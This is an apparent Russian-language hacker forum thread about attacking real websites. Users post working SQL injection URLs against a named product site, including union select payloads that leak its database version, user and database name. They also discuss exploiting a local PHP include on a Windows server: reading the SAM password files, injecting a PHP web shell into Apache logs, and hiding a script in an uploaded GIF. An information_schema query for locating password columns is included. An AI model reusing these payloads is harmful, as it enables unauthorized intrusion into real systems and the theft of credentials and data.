http://www.umpcportal.com/products/product.php?id=-161+order+by+2/* Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/www.umpcportal.com/products/product.php on line 123 Хоть и знаю,что это такое,но всё равно, не даёт мне покоя,что мне делать,как мне быть,как мне эту хрень забыть(.А понт в том,что если вместо 2 подставить 1,то все ошибки чудесным образом пропадают)),через юнион ничерта не работает.Версия мускула четвёртая,знач юнион должен пахать,и значит скуля есть.Конструкицю ака /**/ пробывал.
Code: www.umpcportal.com/products/product.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())/* 4.0.24_Debian-10sarge2-log:carrypad@localhost:carrypadproducts не понял, в чем у тебя проблема =\
http://www.umpcportal.com/products/product.php?id=-161%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
Ищи табы, потом колонки. Вот что нашел я: Code: http://www.umpcportal.com/products/product.php?id=-1+union+select+concat_ws(0x3a,id,name,status)+from+products/*
ОМГ, http://www.umpcportal.com/products/product.php?id=-161+order+by+38/* обрати внимание на ошибку вверху страницы http://www.umpcportal.com/products/product.php?id=-161+order+by+37/* обрати внимание, что ошибки нет
У мя такое ощущение,что есть список таблиц этой версии,ибо сбрутить или догадаться самому это анриал =__________=
лол есть просто списки как при бруте паса по словарю вот и все, а как назвать таблу - это дело владельца дб эт всёравно что сказать - есть список всех пасов от инета
у меня вопрос: что можно сделать с локальным пхп-инклудом, если: +инклуд лога я запарол, тепрь там ошибка (error.log и access.log, других там нет). +загружать на сервер нифига нельзя. +стоит винда, могу прочесть файлы WINDOWS\repair\sam и C:\WINDOWS\repair\system, но конечно же если их сохранять через страницу - расшифровать их неудастся - повредится структура. +проверял файл тоталкоммандера - его там нет. +БД там стоит ibase Посоветуйте что-нить дельное. Благодарствую!
ты уверен, что там локальный инклюд? посмотри еслть ли возможность заливать какие нибудь файлы, картинки и т.п. например аватары залей тогда гифку со скриптом и попробуй ее проинклюдть
я же говорю, нихрена нельзя заливать. 100% локальный инклуд. мот кто знает БД ibase в каком файле пароли хранятся? Щас поищу в инете этот серв, буду сам разбираться, но всерано оставляйте свои предложения. И Ещё: как правильно в логи шелл записывать? У себя на окалхосте я писал <?system($_POST[cmd])?> и писалось, а на том сервере пришлось вопросики урл-закодировать, но что-то не прокатило (шелл был вида <?include("http://shell")?>? нужно было делать такой <?system($_POST[cmd])?>, но я уже запорол... (пост - потомучто инклуд, с параметрами гет, там почемуто не инклудит - еррор выдает)) ошібка такая: Parse error: parse error, unexpected T_STRING in C:\Program Files\ХХХ\Apache\logs\error.log on line 45831
Всем хай ! У меня вопрос, могу ли я осуществить поиск по базе майскуль через инъекцию, например, есть скуль - http://site.ru/index.php?id=1'+union+select+1,2,3,4,5/* Там крайне много таблиц с юзерами, мне нужна лишь одна из них, с авторизацией на главной паге, я зарегистрировался, и поставил, скажем пасс 123456, и хочу найти по базе таблицу в которой есть значение 123456, возможно ли это ?
Нет, насколько мне известно выборку/поиск можно осуществлять только зная таблицу. Т.к. человек не сможет перечислить все предметы что лежат в ящике, не открыв самого ящика. Да и такой извращенский запрос я представить не могу.
можно для 5-й версии по столбцу ,примерно так: +union+select+table_name+from+information_schema.columns+where+column_name='password'/* но надо знать столбец
